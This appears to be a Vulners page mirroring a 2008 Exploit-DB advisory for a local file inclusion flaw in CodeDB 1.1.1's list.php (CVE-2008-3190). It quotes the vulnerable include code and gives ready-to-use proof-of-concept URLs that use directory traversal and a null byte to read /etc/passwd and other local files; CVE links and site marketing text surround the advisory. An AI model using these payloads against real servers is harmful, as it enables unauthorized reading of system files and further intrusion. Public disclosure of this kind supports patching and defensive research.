Lucene search
+L

CodeDB 1.1.1 - 'list.php' Local File Inclusion

🗓️ 14 Jul 2008 00:00:00Reported by cOndemnedType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 39 Views

CodeDB 1.1.1 - 'list.php' Local File Inclusion Vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-3190
14 Jul 200800:00
circl
cve
CVE
CVE-2008-3190
16 Jul 200818:00
cve
cvelist
Cvelist
CVE-2008-3190
16 Jul 200818:00
cvelist
euvd
EUVD
EUVD-2008-3180
7 Oct 202500:30
euvd
nvd
NVD
CVE-2008-3190
16 Jul 200818:41
nvd
prion
Prion
Directory traversal
16 Jul 200818:41
prion
###############################################################################
#
#   Name    :   CodeDB (list.php lang) Local File Inclusion Vulnerability
#   Author  :   cOndemned
#   Greetz  :   ZaBeaTy, str0ke, irk4z, GregStar, doctor, Adish, Avantura ;*
#
###############################################################################

Source :

    // list.php

    2.  $lang = htmlspecialchars($_GET['lang']);            // ok, but.... for what ? lol

    7.  if(file_exists('templates/'.$lang.'_middle.php'))   // We'll have to cut off rest of filename & extension
	8.      include('templates/'.$lang.'_middle.php');      // Ekhm... pwned ;d


Proof of Concept :

    http://[host]/[codeDB_path]/list.php?lang=../readme.txt%00
    http://[host]/[codeDB_path]/list.php?lang=../../../../etc/passwd%00
    http://[host]/[codeDB_path]/list.php?lang=../[local_file]%00


EoF.

# milw0rm.com [2008-07-14]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Dec 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.8
EPSS0.02297
39